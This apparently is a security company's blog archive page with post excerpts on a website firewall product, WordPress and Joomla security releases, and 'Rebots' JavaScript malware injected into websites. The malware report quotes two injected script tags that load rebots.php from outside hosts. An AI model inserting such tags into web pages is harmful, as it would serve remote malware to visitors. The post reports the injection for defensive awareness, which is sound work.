Sucuri CloudProxy – Website Firewall Enhancements

When LA’s DA says that, “73% of our local businesses appear to have been hacked,” it begins to illustrate the importance website protection will play in the future of business, which is why we’ve placed so much emphasis on website protection on this blog over the last few months.

Protection is no longer a, “nice to have,” and has crossed into the realm of necessity. Website owners know about website hacks and DDoS attacks and malware injections, but they often don’t know how to stop them from happening and until a hack hurts their own business, it’s very easy to believe that these hacks will happen to other people and other businesses. That’s why we’ve written so much about our Website Firewall – CloudProxy lately. Truly, we want to help keep your website safe.

In that spirit, we challenged ourselves to make our firewall more intuitive to use so that any website owner will be able to take control of their own security protocols. We’re proud to announce that our team has made some great strides, in terms of user experience, lately and, in this post, we’ll highlight a few of the enhancements we’ve put in place.

CloudProxy – Website Firewall Redefined

The Website Firewall was designed to give website owners peace of mind with a simple objective in mind; to keep your website safe by stopping the attacks from happening.

The logic behind the firewall is simple. It filters through all incoming website traffic and intelligently identifies good and bad traffic. All good traffic is allowed to hit your website and all bad traffic is blocked, which protects your website. In the end, the process looks a lot like this.

How the Sucuri Firewall Protects Websites

Latest Enhancements

The last major update to CloudProxy occurred in February, and back then, our update focused on a few key structural points:

  1. CDN Support (i.e., MaxCDN, CloudFlare, etc..)
  2. Reporting (i.e., Visualization)
  3. Point of Presence Expansion (i.e., More servers world wide)
  4. Back-end Rewrite (i.e., Code Refactoring)

In this update, we’ve focused more on the user experience, while still making some functional updates. Over the rest of the post, we’ll go over:

  1. Real-Time Monitoring
  2. An Improved Onboarding Process
  3. Country Blocks
  4. Enhanced Denial of Service (DOS) Protection


Read More

WordPress 3.6.1 Released – Includes Security Fixes

The WordPress team just pushed out a new version of WordPress. WordPress 3.6.1 is a maintenance release that includes some security bug fixes. Straight from their release post, these are the security changes:

  1. Block unsafe PHP unserialization that could occur in limited situations and setups, which can lead to remote code execution. Reported by Tom Van Goethem.
  2. Prevent a user with an Author role, using a specially crafted request, from being able to create a post “written by” another user. Reported by Anakorn Kyavatanakij.
  3. Fix insufficient input validation that could result in redirecting or leading a user to another website. Reported by Dave Cummo, a Northrup Grumman subcontractor for the U.S. Centers for Disease Control and Prevention.

We asked WordPress Lead Developer, Andrew Nacin for a bit of clarity around the author role issue that was fixed, here’s what Andrew said:

A user can reassign the authorship of a post to another user, even when they are not allowed to do so. (For example, the user is an Author and not an Editor.) The user must already be allowed to edit content — and specifically edit that post. They also then lose the ability to edit that post, but this “forging” could still cause a compromised account or malicious user to post as another user.

In closing the conversation with Andrew, he remarked that WordPress is not vulnerable to the remote code execution issue by default:

I’ll emphasize that WordPress is *NOT* exploitable to the RCE out of the box, despite it being a doozy. It requires a vulnerable object (which core does not have), as well as a vulnerable character set. It is a “perfect storm” vulnerability.


Read More

New WordPress and Joomla Updates Available

If you are a WordPress or Joomla user, you better start updating your sites now.

Joomla 2.5.14

Joomla 2.5.14 was released containing some critical security fixes. They didn’t provide much details, but by the summary is seems serious enough to allow users to bypass upload restrictions:

Project: Joomla!
Severity: Critical
Versions: 2.5.13 and earlier 2.5.x versions. 3.1.4 and earlier 3.x versions.
Exploit type: Unauthorised Uploads
Reported Date: 2013-June-25
Fixed Date: 2013-July-31
Description: Inadequate filtering leads to the ability to bypass file type upload restrictions.

More information on Joomla 2.5.14 update here: http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads

WordPress 3.6

WordPress 3.6 (a major release) was also announced with multiple new features and bug fixes. It doesn’t have any specific security fix, but keeping your site updated is a must, so we recommend all users to update.

More information on WordPress 3.6 is available here: http://codex.wordpress.org/Version_3.6


We recommend upgrading as soon as possible to reduce the risk of issue. Make sure you test your upgrades in a development environment before you go hot.

If you have any questions, feel free to drop an email.

WordPress 3.5.2 Security and Maintenance Release

The WordPress team just pushed out a new version of WordPress (3.5.2) that has some security bugs fixed. Straight from their release post, these are the security changes:

  1. Blocking server-side request forgery attacks, which could potentially enable an attacker to gain access to a site.
  2. Disallow contributors from improperly publishing posts, reported by Konstantin Kovshenin, or reassigning the post’s authorship, reported by Luke Bryan.
  3. An update to the SWFUpload external library to fix cross-site scripting vulnerabilities. Reported by mala and Szymon Gruszecki.
  4. Prevention of a denial of service attack, affecting sites using password-protected posts.
  5. An update to an external TinyMCE library to fix a cross-site scripting vulnerability. Reported by Wan Ikram.
  6. Multiple fixes for cross-site scripting. Reported by Andrea Santese and Rodrigo.
  7. Avoid disclosing a full file path when a upload fails. Reported by Jakub Galczyk.


Read More

Joomla Version 2.5.10 Released – Security Updates

This morning the Joomla development team released a new version of the Joomla platform. This is a Security release, so please be sure to update if you’re on the 2.x branch. If you’re on the 1.x branch the odds of updating seamlessly is highly unlikely so please do so only if you’re engaging a developer to assist you.

This release address 7 security issues, all of them appear to be low to moderate and revolve around Cross-Site Scripting (XSS), Denial of Service (DOS) and Privilege Escalation. It also contains another 38 bug fixes.

Security Fixes include:

If you can, please be sure to update, you can get your latest releases off the Joomla website here.

WordPress 3.5 Released

Update like it’s hot!

Today marks the release of WordPress 3.5 (Named Elvin after jazz drimmer Elvin Jones), a major release this year for the WordPress project.

WordPress 3.5

This release highlights some very significant changes to anything from the JavaScript libraries being used, to a brand new Media Manager. Although there are no security fixes highlighted, there were various bugs fixed along with the newly added features.


Read More

WordPress 3.4.2 Released – Maintenance and Security Update!!

As many know, today the WordPress team released a new patch for WordPress 3.4.2, and have titled it a maintenance and security release.

WordPress 3.4.2 Update

By now many have regurgitated the same post in a number of different blogs and forums pushing the word out, that’s great.

It took us a bit longer because we wanted to better understand the specifics of the security release. Here is what we found:

Read More

Rebots.php JavaScript Malware Being Actively Injected

Holy JavaScript malware, Batman! On August 11th we started seeing the Rebot JavaScript malware string injected on various websites. Since then, it has increased its appearances, and has variated the way it’s being included on the infected sites.

Rebots

When you visit a compromised site, it will attempt to load an additional JavaScript, like one of these:

<script src="http://lig-limp.com.br/rebots.php"..

<script; src="http://chezbruna.com.br/imagens/rebots.php"..


Read More

WordPress Update – 3.3.3 and 3.4.1 Patches Released!!

Well it was only a few weeks ago, but today, two new patches were released: 3.3.3 and 3.4.1.

The good news is, as they are patches, the updates should be fairly straight forward and should not cause much, if any, issues. It is important to note though that this is a Maintenance and Security release. On their official post they highlight the following items:

  • Fixes an issue where a theme’s page templates were sometimes not detected.
  • Addresses problems with some category permalink structures.
  • Better handling for plugins or themes loading JavaScript incorrectly.
  • Adds early support for uploading images on iOS 6 devices.
  • Allows for a technique commonly used by plugins to detect a network-wide activation.
  • Better compatibility with servers running certain versions of PHP (5.2.4, 5.4) or with uncommon setups (safe mode, open_basedir), which had caused warnings or in some cases prevented emails from being sent.


Read More

Joomla 2.5.5 released (security update)

Joomla 2.5.5 was just released today, with a few bugs fixed and 2 important security updates for a privilege escalation and an information disclosure issue:

1- Privilege escalation

High severity security issue, that allows unprivileged users to get admin access to a site running Joomla.

2- Information Disclosure

This is a low severity security issue that leaks internal information about the database, internal paths and PHP info.

More information about this release here: Joomla 2.5.5 released

Remember, the leading cause for web site compromises is outdated software! So as a web site owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

Sitecheck was also updated to alert users not running version 2.5.5 on their Joomla sites.